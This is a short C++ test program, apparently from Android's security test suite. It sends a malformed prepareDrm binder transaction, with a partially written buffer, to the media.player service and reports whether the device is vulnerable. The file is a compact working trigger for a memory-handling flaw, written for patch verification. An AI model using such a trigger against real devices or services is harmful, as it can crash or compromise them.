/** * Copyright (C) 2022 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include #include #include "../includes/common.h" using namespace android; int main() { constexpr size_t bufferSize = 16; constexpr uint32_t prepareDrm = 39; constexpr uint32_t unknownTrxnCode = prepareDrm + 5; sp serviceManager = defaultServiceManager(); FAIL_CHECK(serviceManager != nullptr); sp mediaPlayerService = serviceManager->getService(String16("media.player")); FAIL_CHECK(mediaPlayerService != nullptr); sp iMediaPlayerService = IMediaPlayerService::asInterface(mediaPlayerService); FAIL_CHECK(iMediaPlayerService != nullptr); sp mediaPlayer = new MediaPlayer(); FAIL_CHECK(mediaPlayer != nullptr); sp iMediaPlayer = iMediaPlayerService->create(mediaPlayer); FAIL_CHECK(iMediaPlayer != nullptr); Parcel data, reply; data.writeInterfaceToken(iMediaPlayer->getInterfaceDescriptor()); status_t status = IMediaPlayer::asBinder(iMediaPlayer)->transact(unknownTrxnCode, data, &reply); FAIL_CHECK(status == UNKNOWN_TRANSACTION); const uint8_t arr[bufferSize] = {}; data.write(arr, bufferSize); data.writeUint32(bufferSize); // only write part of the buffer. If we write `bufferSize-3` or more, // binder will round it up to bufferSize. It rounds up to the nearest 4. So, // 7 is sufficiently small, it won't get rounded up to the full bufferSize. data.write(arr, 7); status = IMediaPlayer::asBinder(iMediaPlayer)->transact(prepareDrm, data, &reply); return status == OK ? EXIT_VULNERABLE : EXIT_SUCCESS; }